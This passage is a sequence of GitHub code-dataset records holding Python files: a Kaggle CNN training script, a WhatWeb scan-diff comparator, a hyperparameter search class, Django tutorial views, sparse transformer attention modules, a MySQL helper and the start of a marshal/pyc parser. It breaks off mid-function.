activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(128, (3, 3), activation='relu'))\n model.add(Flatten())\n model.add(Dense(2048, activation='relu'))\n model.add(Dropout(0.65))\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.55))\n model.add(Dense(1, activation='sigmoid'))\n sgd = optimizers.SGD(lr = 0.001, decay = 1e-6, momentum = 0.8, nesterov = True)\n model.compile(loss = 'binary_crossentropy', optimizer = sgd, metrics=['accuracy'])\n print(model.summary())\n return model\n\nn_fold = 8\nkf = model_selection.KFold(n_splits = n_fold, shuffle = True)\neval_fun = metrics.roc_auc_score\n\ndef run_oof(tr_x, tr_y, te_x, kf):\n preds_train = np.zeros(len(tr_x), dtype = np.float)\n preds_test = np.zeros(len(te_x), dtype = np.float)\n train_loss = []; test_loss = []\n\n i = 1\n for train_index, test_index in kf.split(tr_x):\n x_tr = tr_x[train_index]; x_te = tr_x[test_index]\n y_tr = tr_y[train_index]; y_te = tr_y[test_index]\n\n datagen = ImageDataGenerator(\n # featurewise_center = True,\n rotation_range = 30,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n # zca_whitening = True,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n vertical_flip = True,\n fill_mode = 'nearest')\n datagen.fit(x_tr)\n\n model = model_nn()\n earlystop = keras.callbacks.EarlyStopping(monitor='val_loss', patience = 15, verbose=0, mode='auto')\n model.fit_generator(datagen.flow(x_tr, y_tr, batch_size = 64),\n validation_data = (x_te, y_te), callbacks = [earlystop],\n steps_per_epoch = len(train_img) / 64, epochs = 1000, verbose = 2)\n\n train_loss.append(eval_fun(y_tr, model.predict(x_tr)[:, 0]))\n test_loss.append(eval_fun(y_te, 
model.predict(x_te)[:, 0]))\n\n preds_train[test_index] = model.predict(x_te)[:, 0]\n preds_test += model.predict(te_x)[:, 0]\n\n print('{0}: Train {1:0.5f} Val {2:0.5f}'.format(i, train_loss[-1], test_loss[-1]))\n i += 1\n\n print('Train: ', train_loss)\n print('Val: ', test_loss)\n print('Train{0:0.5f}_Test{1:0.5f}\\n\\n'.format(np.mean(train_loss), np.mean(test_loss)))\n preds_test /= n_fold\n return preds_train, preds_test\n\ntrain_pred, test_pred = run_oof(train_img, train_label, test_img, kf)\n\ntest_set['invasive'] = test_pred\ntest_set.to_csv('./submit.csv', index = None)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/invasive-species-monitoring/MaXXX/naive-bagging-cnn-pb0-985.py","file_name":"naive-bagging-cnn-pb0-985.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"34331451885","text":"from analyzer.comparators.comparator_interface import ComparatorABC\nimport dictdiffer\n\n\nclass WhatWebComparator(ComparatorABC):\n def compare(self, data_to_compare_list=list, result_list=list):\n difference = ''\n for diff in list(dictdiffer.diff(data_to_compare_list, result_list)):\n action = diff[0]\n name = ''\n changes = ''\n\n if action == 'change':\n action = 'Scanned data has changed:'\n if isinstance(diff[1], str):\n name = diff[1]\n else:\n for i in diff[1]:\n name += str(i) + '-'\n name = name[:-1]\n\n changes = \": \" + str(diff[2][0]) + \" -> \" + str(diff[2][1])\n\n if action == 'add':\n action = 'Added to scanned data:'\n name = diff[1]\n\n for change in diff[2]:\n changes += '\\n' + str(change)\n\n if action == 'remove':\n action = 'Removed from scanned data:'\n name = diff[1]\n\n for change in diff[2]:\n changes += '\\n' + str(change)\n\n difference += action + ' ' + str(name) + ' ' + changes\n difference += '\\n\\n'\n\n if difference == '':\n difference = 'None'\n\n return difference\n","repo_name":"s3m3n1s/webchch","sub_path":"analyzer/comparators/whatweb_comparator.py","file_name":"whatweb_comparator.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38369539945","text":"import numpy as np\nfrom log import log\nimport pandas as pd\n\nclass ParamSearch:\n def __init__(self, learner, params):\n self.learner = learner\n self.params = params\n self.history = []\n self.best_params = None\n self.final_learner = None\n\n def search(self, X_train, y_train, iterations):\n log(\"Searching for params...\")\n log(\"\")\n self.history = []\n self.best_params = None\n\n for _ in range(iterations):\n selected_params = {}\n for key in self.params:\n selected_value = self.params[key]\n selected_params[key] = np.random.choice(selected_value, 1)[0]\n\n splits = np.array_split(X_train.join(y_train, sort=False), 5)\n validation_scores = []\n for i in range(5):\n train = splits.copy()\n validation = splits[i]\n del train[i]\n train = pd.concat(train, sort=False)\n\n y_cross = train[\"label\"]\n X_cross = train.drop(columns=\"label\")\n y_cross_val = validation[\"label\"]\n X_cross_val = validation.drop(columns=\"label\")\n\n learner = self.learner(**selected_params)\n learner.fit(X_cross, y_cross)\n validation_score = learner.score(X_cross_val, y_cross_val)\n validation_scores.append(validation_score)\n\n final_validation_score = sum(validation_scores) / 5\n self.history.append((selected_params, final_validation_score))\n\n log(f\"Params: 
{selected_params}\")\n log(f\"5-fold Validation score: {final_validation_score}\")\n log(\"\")\n\n def find_best(self):\n best_history = sorted(self.history, key=lambda x: x[1], reverse=True)[0]\n log(f\"Best params: {best_history[0]}\")\n log(f\"Best 5-fold validation score: {best_history[1]}\")\n log(\"\")\n\n self.best_params = best_history[0]\n\n def fit(self, X, y):\n self.final_learner = self.learner(**self.best_params)\n self.final_learner.fit(X, y)\n\n def score(self, X, y):\n return self.final_learner.score(X, y)\n\n \n\n\n","repo_name":"mathiasoldfarm/boosting-bagging","sub_path":"param_search.py","file_name":"param_search.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24919023525","text":"from django.shortcuts import render, HttpResponse, redirect\r\nfrom backend.models import Article\r\nfrom django.db.models import Q\r\nfrom backend.forms import FormArticle\r\nfrom django.contrib import messages\r\n\r\n# Create your views here.\r\nlayout = \"\"\" \r\n
Sitio web con django | Orlin Diaz Diaz\r\n\r\n\r\n
\r\n \"\"\"\r\n\r\ndef inicio(request):\r\n return HttpResponse(layout)\r\n \r\n\r\ndef holamundo(request):\r\n return render(request, 'holamundo.html')\r\n\r\ndef pagina(request, redirigir=0):\r\n \r\n if redirigir == 1: \r\n return redirect('/nombreApellido/', nombre=\"Orlin\", apellidos=\"Diaz\")\r\n \r\n return HttpResponse(layout+\"cargando paginas de las vistas\")\r\n\r\n\r\n\r\ndef inicioyear(request):\r\n '''\r\n html = \"\"\"\r\n
    \r\n \"\"\"\r\n year = 2023\r\n \r\n while year <= 2050:\r\n if year % 2 == 0:\r\n html += f\"
  • {str(year)}\"\r\n year += 1\r\n html += \"
      \" '''\r\n \r\n year = 2023\r\n hasta = range(year, 2051)\r\n \r\n return render(request, 'index.html', {\r\n 'years': hasta\r\n })\r\n\r\ndef nombreApellidos(request):\r\n nombre = \"Orlin de los santos\"\r\n apellidos = \"Diaz Diaz\"\r\n \r\n nombre_completo = f\"{nombre} {apellidos}\"\r\n \r\n lenguajes = ['Javascirpt', 'Reac.js', 'Node.js', 'Python', 'Tkinter', 'Django']\r\n \r\n return render(request, 'index.html', {\r\n \"mi_variable\": \"Soy una vista mostrada en la template de django\",\r\n \"nombre\": nombre_completo,\r\n \"lenguajes\": lenguajes\r\n })\r\n\r\n\r\ndef prueba(request):\r\n return render(request, 'pagina.html', {\r\n 'texto': \"\",\r\n \"lista\": ['uno', 'dos', 'tres']\r\n })\r\n\r\ndef contacto(request, nombre=\"\", apellidos=\"\", edad=\"\"):\r\n html = \"\"\r\n \r\n if nombre and apellidos and edad:\r\n html = \"El nombre completo es:\"\r\n html = f\"{nombre} {apellidos} {edad}\"\r\n \r\n return HttpResponse(layout+f\"
Contacto {nombre} {apellidos} {edad}
      \"+html)\r\n\r\n#creando los articulos y guardando en la base de datos\r\ndef crear_articulo(request, title, content, public):\r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n \r\n return HttpResponse(f'Articulo Creado: {articulo.title} {articulo.content} {articulo.public}')\r\n\r\ndef save_articulo(request):\r\n if request.method == \"POST\":\r\n \r\n title = request.POST['title']\r\n \r\n if len(title) <= 5:\r\n return HttpResponse(f'El titulo es muy pequeno')\r\n \r\n content = request.POST['content']\r\n public = request.POST['public']\r\n \r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n return HttpResponse(f'Articulo guardado: {articulo.title} {articulo.content} {articulo.public}')\r\n \r\n else:\r\n return HttpResponse(f'
No se ha podido crear el articulo...
      ')\r\n \r\ndef create_article(request):\r\n \r\n return render(request, 'create-article.html')\r\n\r\n#(mostrar/obtener) los articulos\r\ndef articulo(request):\r\n \r\n try:\r\n articulo = Article.objects.get(pk=9, public=False)\r\n response = f'
Articulo: {articulo.id}. {articulo.title} {articulo.content}
      '\r\n except:\r\n response = \"
Articulo no encontrado
      \"\r\n \r\n return HttpResponse(response)\r\n\r\n#editar los articulos\r\ndef editar_articulo(request, id):\r\n articulo = Article.objects.get(pk=id)\r\n \r\n articulo.title = \"Batman\"\r\n articulo.content = \"Pelicula del 2017\"\r\n articulo.public = True\r\n \r\n articulo.save()\r\n \r\n return HttpResponse(f'Articulo Editado: {articulo.title} {articulo.content} {articulo.public}')\r\n\r\ndef create_full_article(request):\r\n \r\n if request.method == 'POST':\r\n formulario = FormArticle(request.POST)\r\n \r\n if formulario.is_valid():\r\n form_data = formulario.cleaned_data\r\n \r\n title = form_data.get('title')\r\n content = form_data['content']\r\n public = form_data['public']\r\n \r\n articulo = Article(\r\n title = title,\r\n content = content,\r\n public = public\r\n )\r\n \r\n articulo.save()\r\n \r\n #crear mensajes flash que solo se muestra una vez\r\n messages.success(request, f'Has creado correctamente el articulo {articulo.id}')\r\n \r\n return redirect('articulos')\r\n else:\r\n formulario = FormArticle()\r\n \r\n return render(request, 'create_full_article.html', {\r\n 'form': formulario\r\n })\r\n\r\ndef articulos(request):\r\n articulos = Article.objects.all().order_by(\"-id\")\r\n \r\n #articulos = Article.objects.filter(title__contains=\"Javascritpt and Python\")\r\n #articulos = Article.objects.filter(title__exact=\"Javascritpt and Python\")\r\n \r\n #mayor a la cantidad \r\n #articulos = Article.objects.filter(id__gt=17)\r\n \r\n ##mayor o igual\r\n #articulos = Article.objects.filter(id__gte=13)\r\n \r\n #menores a la cantidad\r\n # articulos = Article.objects.filter(id__lt=13)\r\n \r\n #menor o igual\r\n #articulos = Article.objects.filter(id__lte=13, title__contains=\"Progrmacion con python\")\r\n '''\r\n articulos = Article.objects.filter(\r\n Q(title__contains=\"11\") | Q(public=False)\r\n )\r\n \r\n articulos = Article.objects.filter(id__gte=10).exclude(public=True)\r\n \r\n articulos = Article.objects.raw(\"SELECT * FROM backend_article WHERE title='Articulo 2' AND public=0\")\r\n '''\r\n return render(request, 'articulos.html', {\r\n 'articulos': articulos\r\n })\r\n \r\ndef borrar_articulo(request, id):\r\n articulo = Article.objects.get(pk=id)\r\n \r\n articulo.delete()\r\n return redirect('articulos')","repo_name":"elOrlin/python","sub_path":"AprendiendoDjango copy/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"283731769","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Attention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197):\n super().__init__()\n self.num_heads = num_heads\n self.num_patches = num_patches\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, x):\n B, N, C = x.shape\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)\n\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return 
x\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197):\n super().__init__()\n self.num_heads = num_heads\n self.num_patches = num_patches\n head_dim = dim // num_heads\n self.dim = dim\n self.scale = qk_scale or head_dim ** -0.5\n\n self.q = nn.Linear(dim, dim, bias=qkv_bias)\n self.k = nn.Linear(dim, dim, bias=qkv_bias)\n self.v = nn.Linear(dim, dim, bias=qkv_bias)\n \n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n def forward(self, q,k,v,attn_mask=None):\n \n q = q.permute(1,0,2)\n k = k.permute(1,0,2)\n v = v.permute(1,0,2)\n \n \n B,N_q,N_k,N_v,C = q.shape[0],q.shape[1],k.shape[1],v.shape[1],q.shape[2]\n \n \n q = self.q(q).reshape(B, N_q, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n k = self.k(k).reshape(B, N_k, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n v = self.v(v).reshape(B, N_v, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)[0]\n\n \n# print(q.shape,k.shape,v.shape)\n if attn_mask is not None:\n attn_mask = attn_mask.to(torch.bool)\n\n attn_mask = attn_mask.view(B, 1, 1, N_k).expand(-1, self.num_heads, -1, -1).reshape(B*self.num_heads, 1, N_k)\n\n new_attn_mask = torch.zeros_like(attn_mask, dtype=q.dtype)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n \n \n if attn_mask is not None:\n attn = torch.baddbmm(attn_mask, q.reshape(B*self.num_heads,N_q,C // self.num_heads), k.reshape(B*self.num_heads,N_k,C // self.num_heads).transpose(-2, -1)) * self.scale\n attn = attn.reshape(B,self.num_heads,N_q,N_k)\n \n else:\n attn = (q @ k.transpose(-2, -1)) * self.scale\n \n attn = attn.softmax(dim=-1)\n \n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N_q, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n x = x.permute(1,0,2)\n return x \n\n# dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0., num_patches=197 \nclass MultiHeadSparseAttention(MultiHeadAttention):\n def __init__(self, attn_module, head_search=False, uniform_search=False):\n super().__init__(attn_module.q.in_features, attn_module.num_heads, True, attn_module.scale, attn_module.attn_drop.p, attn_module.proj_drop.p)\n self.is_searched = False\n self.num_gates = attn_module.q.in_features // self.num_heads\n if head_search and not uniform_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, 1))\n elif uniform_search and not head_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, 1, 1, self.num_gates))\n elif head_search and uniform_search:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, self.num_gates))\n else:\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_heads, 1, self.num_gates))\n \n self.searched_zeta = torch.ones_like(self.zeta)\n \n self.patch_zeta = nn.Parameter(torch.ones(1, self.num_patches, 1)*3)\n self.searched_patch_zeta = torch.ones_like(self.patch_zeta)\n self.patch_activation = nn.Tanh()\n \n def forward(self,q,k,v,attn_mask=None):\n q = q.permute(1,0,2)\n k = k.permute(1,0,2)\n v = v.permute(1,0,2)\n \n z = self.searched_zeta if self.is_searched else self.zeta\n \n B,N_q,N_k,N_v,C = q.shape[0],q.shape[1],k.shape[1],v.shape[1],q.shape[2]\n \n q = self.q(q).reshape(B, N_q, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n k = self.k(k).reshape(B, N_k, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n v = self.v(v).reshape(B, 
N_v, 1, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n \n q = (q*z)[0]\n k = (k*z)[0]\n v = (v*z)[0]\n \n if attn_mask is not None:\n attn_mask = attn_mask.to(torch.bool)\n\n attn_mask = attn_mask.view(B, 1, 1, N_k).expand(-1, self.num_heads, -1, -1).reshape(B*self.num_heads, 1, N_k)\n\n new_attn_mask = torch.zeros_like(attn_mask, dtype=q.dtype)\n new_attn_mask.masked_fill_(attn_mask, float(\"-inf\"))\n attn_mask = new_attn_mask\n \n \n if attn_mask is not None:\n attn = torch.baddbmm(attn_mask, q.reshape(B*self.num_heads,N_q,C // self.num_heads), k.reshape(B*self.num_heads,N_k,C // self.num_heads).transpose(-2, -1)) * self.scale\n attn = attn.reshape(B,self.num_heads,N_q,N_k)\n \n else:\n attn = (q @ k.transpose(-2, -1)) * self.scale\n \n attn = attn.softmax(dim=-1)\n \n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B, N_q, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n x = x.permute(1,0,2)\n return x\n \n def get_zeta(self):\n return self.zeta.cuda(), self.patch_activation(self.patch_zeta).cuda()\n \n def compress(self, threshold_attn):\n self.is_searched = True\n self.searched_zeta = (self.zeta>=threshold_attn).float().cuda()\n self.zeta.requires_grad = False\n \n def compress_patch(self, threshold_patch=None, zetas=None):\n self.is_searched = True\n zetas = torch.from_numpy(zetas).reshape_as(self.patch_zeta)\n self.searched_patch_zeta = (zetas).float().to(self.zeta.device)\n self.patch_zeta.requires_grad = False\n\n def decompress(self):\n self.is_searched = False\n self.zeta.requires_grad = True\n self.patch_zeta.requires_grad = True\n\n def get_params_count(self):\n dim = self.q.in_features\n active = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1:\n active*=self.num_gates\n elif self.zeta.shape[2] == 1:\n active*=self.num_heads\n total_params = dim*dim*3 + dim*3\n total_params += dim*dim + dim\n active_params = dim*active*3 + active*3\n active_params += active*dim +dim\n return total_params, active_params\n \n def get_flops_s(self,num_patches_query,num_patches_key):\n H = self.num_heads\n N_q = num_patches_query\n N_k = num_patches_key\n d = self.num_gates\n sd = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1: # Head Elimination\n sd*=self.num_gates\n elif self.zeta.shape[2] == 1: # Uniform Search\n sd*=self.num_heads\n total_flops = N_q * (H*d * (H*d)) + N_q*H*d #linear q\n total_flops += 2*(N_k * (H*d * (H*d)) + N_k*H*d) #linear k and v\n# total_flops = N * (H*d * (3*H*d)) + 3*N*H*d #linear: qkv\n total_flops += H*N_q*d*N_k + H*N_q*N_k #q@k\n total_flops += 5*H*N_q*N_k #softmax\n total_flops += H*N_q*N_k*d #attn@v\n total_flops += N_q * (H*d * (H*d)) + N_q*H*d #linear: proj\n \n return total_flops\n \n def get_flops(self, num_patches, active_patches):\n H = self.num_heads\n N = num_patches\n n = active_patches\n d = self.num_gates\n sd = self.searched_zeta.sum().data\n if self.zeta.shape[-1] == 1: # Head Elimination\n sd*=self.num_gates\n elif self.zeta.shape[2] == 1: # Uniform Search\n sd*=self.num_heads\n total_flops = N * (H*d * (3*H*d)) + 3*N*H*d #linear: qkv\n total_flops += H*N*d*N + H*N*N #q@k\n total_flops += 5*H*N*N #softmax\n total_flops += H*N*N*d #attn@v\n total_flops += N * (H*d * (H*d)) + N*H*d #linear: proj\n \n active_flops = n * (H*d * (3*sd)) + 3*n*sd #linear: qkv\n active_flops += n*n*sd + H*n*n #q@k\n active_flops += 5*H*n*n #softmax\n active_flops += n*n*sd #attn@v\n active_flops += n * (sd * (H*d)) + n*H*d #linear: proj\n return total_flops, active_flops\n\n @staticmethod\n def 
from_attn(attn_module, head_search=False, uniform_search=False):\n attn_module = MultiHeadSparseAttention(attn_module, head_search, uniform_search)\n return attn_module\n\nclass Mlp(nn.Module):\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer='gelu', drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = _get_activation_fn(act_layer)\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n# x = self.drop(x)\n return x\n\nclass SparseMlp(Mlp):\n def __init__(self, mlp_module):\n super().__init__(mlp_module.fc1.in_features, mlp_module.fc1.out_features, mlp_module.fc2.out_features, act_layer='gelu', drop=mlp_module.drop.p)\n self.is_searched = False\n self.num_gates = mlp_module.fc1.out_features\n self.zeta = nn.Parameter(torch.ones(1, 1, self.num_gates))\n self.searched_zeta = torch.ones_like(self.zeta) \n \n def forward(self, x, patch_zeta=None):\n if patch_zeta is not None:\n x*=patch_zeta\n z = self.searched_zeta if self.is_searched else self.get_zeta()\n x = self.fc1(x)\n x = self.act(x)\n x *= z # both fc1 and fc2 dimensions eliminated here\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n \n def get_zeta(self):\n return self.zeta.cuda()\n \n def compress(self, threshold):\n self.is_searched = True\n self.searched_zeta = (self.get_zeta()>=threshold).float().cuda()\n self.zeta.requires_grad = False\n\n def decompress(self):\n self.is_searched = False\n self.zeta.requires_grad = True\n\n def get_params_count(self):\n dim1 = self.fc1.in_features\n dim2 = self.fc1.out_features\n active_dim2 = self.searched_zeta.sum().data\n total_params = 2*(dim1*dim2) + dim1 + dim2\n active_params = 2*(dim1*active_dim2) + dim1 + active_dim2\n return total_params, active_params\n \n def get_flops(self, num_patches, active_patches):\n total_params, active_params = self.get_params_count()\n return total_params*num_patches, active_params*active_patches\n\n @staticmethod\n def from_mlp(mlp_module):\n mlp_module = SparseMlp(mlp_module)\n return mlp_module\n \ndef _get_activation_fn(activation):\n \"\"\"Return an activation function given a string\"\"\"\n if activation == \"relu\":\n return F.relu\n if activation == \"gelu\":\n return F.gelu\n if activation == \"glu\":\n return F.glu\n raise RuntimeError(F\"activation should be relu/gelu, not {activation}.\")\n \n\nclass ModuleInjection:\n method = 'search'\n searchable_modules = []\n\n @staticmethod\n def make_searchable_attn(attn_module, head_search=False, uniform_search=False):\n if ModuleInjection.method == 'full':\n return attn_module\n attn_module = MultiHeadSparseAttention.from_attn(attn_module, head_search, uniform_search)\n ModuleInjection.searchable_modules.append(attn_module)\n# print(attn_module)\n return attn_module\n\n @staticmethod\n def make_searchable_mlp(mlp_module):\n if ModuleInjection.method == 'full':\n return mlp_module\n mlp_module = SparseMlp.from_mlp(mlp_module)\n ModuleInjection.searchable_modules.append(mlp_module)\n# print(mlp_module)\n# print(ModuleInjection.searchable_modules)\n return 
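# --- Minimal sketch of the learnable-gate pruning pattern that
# --- MultiHeadSparseAttention and SparseMlp above implement (illustrative only;
# --- the class name and the 0.5 threshold are hypothetical, not from the repo).
import torch
import torch.nn as nn

class GatedLinear(nn.Module):
    def __init__(self, dim_in, dim_out):
        super().__init__()
        self.fc = nn.Linear(dim_in, dim_out)
        self.zeta = nn.Parameter(torch.ones(1, dim_out))  # one learnable gate per unit
        self.searched_zeta = torch.ones_like(self.zeta)
        self.is_searched = False

    def forward(self, x):
        z = self.searched_zeta if self.is_searched else self.zeta
        return self.fc(x) * z  # soft gates while searching, hard 0/1 after compress()

    def compress(self, threshold):
        # Binarize the gates: units whose gate fell below the threshold are pruned.
        self.is_searched = True
        self.searched_zeta = (self.zeta >= threshold).float()
        self.zeta.requires_grad = False

layer = GatedLinear(8, 4)
layer.compress(threshold=0.5)
print(layer(torch.randn(2, 8)).shape)  # torch.Size([2, 4]); pruned units emit zeros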
mlp_module","repo_name":"transmuteAI/Light-Weight-Trackers","sub_path":"Stark_sparse/lib/models/stark/slim_layers.py","file_name":"slim_layers.py","file_ext":"py","file_size_in_byte":13094,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"21017902074","text":"import pymysql\nfrom Common.Constant import Constant\n\ndef getDB():\n try:\n conn = pymysql.connect(host=Constant.DB_HOST, user=Constant.DB_USER, passwd=Constant.DB_PASSWD,charset='utf8')\n conn.autocommit(True)\n cursor = conn.cursor() # 创建游标对象\n cursor.execute(\"SET NAMES utf8\")\n cursor.execute(\"USE %s\" % Constant.DB_NAME)\n return conn, cursor\n\n except pymysql.Error as e:\n print(\"Mysql Error %d: %s\" % (e.args[0], e.args[1]))\n return None, None\n\ndef getQryData(sql):\n conn, curr = getDB()\n curr.execute(sql)\n datas = curr.fetchall()\n curr.close()\n conn.close()\n return datas\n\ndef getPriceQryPeriods():\n sql = \"select START_PRICE start, END_PRICE end from JX3_PRICE_QRY_INFO order by START_PRICE asc\"\n return getQryData(sql)\n\ndef getOrignPeriods(batchInfo=\"\"):\n if(batchInfo != \"\"):\n batchInfo = f\"where BATCH_ID = {batchInfo}\".format(batchInfo)\n sql = f\"select START_PRICE start, END_PRICE end from JX3_PRICE_QRY_INFO {batchInfo} order by START_PRICE asc\".format(batchInfo)\n return getQryData(sql)\n\n\n","repo_name":"sengeiou/zzpes","sub_path":"zzpes-python/Common/DbHelper.py","file_name":"DbHelper.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"883085289","text":"import argparse\nimport binascii\nimport sys\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple\n\nfrom .bits import bytes_to_float, bytes_to_int, clearBit, testBit\nfrom .magic import get_pyc_header_lenght, get_pyc_python_version\nfrom .object_types import types\n\nPyLong_MARSHAL_SHIFT = 15\n\nDEBUG = False\n\n# Flag_ref = namedtuple(\"Flag_ref\", [\"byte\", \"type\", \"content\", \"usages\"])\nReference = namedtuple(\"Reference\", [\"byte\", \"index\"])\n\n\n@dataclass\nclass Flag_ref:\n byte: int\n type: str\n content: object\n usages: int = 0\n\n\nclass MarshalParser:\n def __init__(self, filename: Path):\n self.filename = filename\n\n with open(filename, \"rb\") as fh:\n self.bytes = bytes(fh.read())\n if len(self.bytes) < 4:\n raise RuntimeError(f\"File {self.filename} is empty!\")\n iterator = enumerate(self.bytes)\n # if pyc magic number is detected, skip entire\n # pyc header (first n bytes)\n self.python_version = get_pyc_python_version(bytes=self.bytes[:4])\n if self.python_version:\n pyc_header_len = get_pyc_header_lenght(self.python_version)\n for x in range(pyc_header_len):\n next(iterator)\n else:\n # Not a pyc file, parse it as a marshal dump without header\n if DEBUG:\n print(\n \"File has no or unknown pyc header, \"\n \"assuming a marshal dump…\"\n )\n\n self.iterator = iterator\n\n def parse(self) -> None:\n self.references: List[\n Reference\n ] = [] # references to existing objects with FLAG_REF\n self.flag_refs: List[Flag_ref] = [] # objects with FLAG_REF on\n self.output = \"\"\n self.indent = 0\n self.read_object()\n\n def record_object_start(\n self, i: int, b: int, ref_id: Optional[int]\n ) -> None:\n \"\"\"\n Records human readable output of parsing process\n \"\"\"\n byte = binascii.hexlify(b.to_bytes(1, \"little\"))\n bytestring = b.to_bytes(1, 
\"little\")\n type = types[bytestring]\n ref = \"\"\n if ref_id is not None:\n ref = f\"REF[{ref_id}]\"\n line = (\n f\"n={i}/{hex(i)} byte=({byte!r}, {bytestring!r}, \"\n f\"{bin(b)}) {type} {ref}\\n\"\n )\n if DEBUG:\n print(line)\n self.output += \" \" * self.indent + line\n\n def record_object_result(self, result: Any) -> None:\n \"\"\"\n Records the result of object parsing with its type\n \"\"\"\n line = f\"result={result}, type={type(result)}\\n\"\n self.output += \" \" * self.indent + line\n\n def record_object_info(self, info: str) -> None:\n \"\"\"\n Records some info about parsed object\n \"\"\"\n line = f\"{info}\\n\"\n self.output += \" \" * self.indent + line\n\n def read_object(self) -> Any:\n \"\"\"\n Main method for reading/parsing objects and recording references.\n Simple objects are parsed directly, complex uses other read_* methods\n \"\"\"\n i, b = next(self.iterator)\n ref_id = None\n if testBit(b, 7):\n b = clearBit(b, 7)\n # Save a slot in global references\n ref_id = len(self.flag_refs)\n self.flag_refs.append(None) # type: ignore\n\n bytestring = b.to_bytes(1, \"little\")\n try:\n type = types[bytestring]\n except KeyError:\n print(\n f\"Cannot read/parse byte {b!r} {bytestring!r} on possition {i}\"\n )\n print(\"Might be error or unsupported TYPE\")\n print(self.output)\n sys.exit(1)\n self.record_object_start(i, b, ref_id)\n\n # Increase indentation\n self.indent += 2\n\n result: Any\n\n if type == \"TYPE_CODE\":\n result = self.read_codeobject()\n\n elif type == \"TYPE_LONG\":\n result = self.read_py_long()\n\n elif type in (\"TYPE_INT\"):\n result = self.read_long()\n\n elif type in (\n \"TYPE_STRING\",\n \"TYPE_UNICODE\",\n \"TYPE_ASCII\",\n \"TYPE_INTERNED\",\n \"TYPE_ASCII_INTERNED\",\n ):\n result = self.read_string()\n\n elif type == \"TYPE_SMALL_TUPLE\":\n # small tuple — size is only one byte\n size = bytes_to_int(self.read_bytes())\n self.record_object_info(f\"Small tuple size: {size}\")\n result = []\n for x in range(size):\n result.append(self.read_object())\n result = tuple(result)\n\n elif type in (\"TYPE_TUPLE\", \"TYPE_LIST\", \"TYPE_SET\", \"TYPE_FROZENSET\"):\n # regular tuple, list, set, frozenset\n size = self.read_long()\n self.record_object_info(f\"tuple/list/set size: {size}\")\n result = []\n for x in range(size):\n result.append(self.read_object())\n if type == 